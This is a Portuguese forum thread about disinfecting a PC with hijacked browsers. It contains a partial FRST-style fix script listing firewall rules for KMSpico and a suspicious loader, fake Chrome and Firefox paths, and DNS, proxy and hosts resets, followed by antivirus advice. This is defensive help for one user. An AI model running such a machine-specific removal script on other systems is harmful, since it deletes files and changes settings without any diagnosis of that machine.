ShortcutWithArgument: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\6f5a275e1b6271b6\Google Chrome.lnk -> C:\Program Files (x86)\Hotleaf\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData
FirewallRules: [{6A649F0C-303E-4B6A-9519-45F5B5DD8E36}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{B1C40C66-E817-42DF-8471-320C8F612511}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{A60BF536-594A-4B86-BD61-A851D4D97C59}] => (Allow) C:\Program Files (x86)\MIO\loader\st9500325as_5ve73x59xxxx5ve73x59.exe
FirewallRules: [{6A783D8B-7E78-4D23-AF43-4E14A87CFF54}] => (Allow) C:\Program Files (x86)\MIO\loader\st9500325as_5ve73x59xxxx5ve73x59.exe
FirewallRules: [{B73F402C-DA8A-47CC-BDDB-2CB28223AAFE}] => (Allow) C:\Program Files (x86)\MIO\loader\st9500325as_5ve73x59xxxx5ve73x59.exe
FirewallRules: [{10CBA690-7C1B-4B05-83B8-A5FADB8377C8}] => (Allow) C:\Program Files (x86)\MIO\loader\st9500325as_5ve73x59xxxx5ve73x59.exe
FirewallRules: [{A60121B4-F1C3-420E-892E-B054242BB370}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{908725CB-3774-4898-A61B-A5DC036FF404}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{64BC6AD6-B538-44AD-8B02-DD0D06057214}] => (Allow) C:\Program Files (x86)\Hotleaf\Application\chrome.exe
C:\Users\Alberto\AppData\Local\background_fault\aswRD.exe
CMD: ipconfig /flushdns
CreateRestorePoint:
RemoveProxy:
Emptytemp:
Hosts:
reboot:
end


Cheguei a montar o script,e que relaciona o comprometimento dos navegadores com hijackers.
O Firefox foi substituído por um fake:

C:\Program Files (x86)\Mozilla Firefox\firefox.exe

C:\Program Files (x86)\Firefox\Firefox.exe << Fake!

Mas resolvi alterar minha instrução para outro possível script ,mais "enxuto" ,e com menos impacto na máquina.

[]s
Moderador - iMasters Fóruns - Segurança & Malwares
Administrador - Fórum SecSecurity
Administrador - Fórum PC Brasil
TmfeijoMMonroe
TmfeijoMMonr... Cyber Highlander Registrado
13.7K Mensagens 4.2K Curtidas
#7 Por TmfeijoMMonr...
23/03/2018 - 09:16
Komm disse:
Como os dois antivírus são da Avast e usam o mesmo motor, tanto faz qual fique no micro. Pela lógica, saiu o que não estava ativo.

[]s.


True; faltou orientar o autor assistido a remover o AVG do note do pai dele ; too. Que já algum pertence à Avast.
E ativar o win defender para ficar hiper e macro protegido.

Abraços
Responder Tópico
© 1999-2024 Hardware.com.br. Todos os direitos reservados.
Imagem do Modal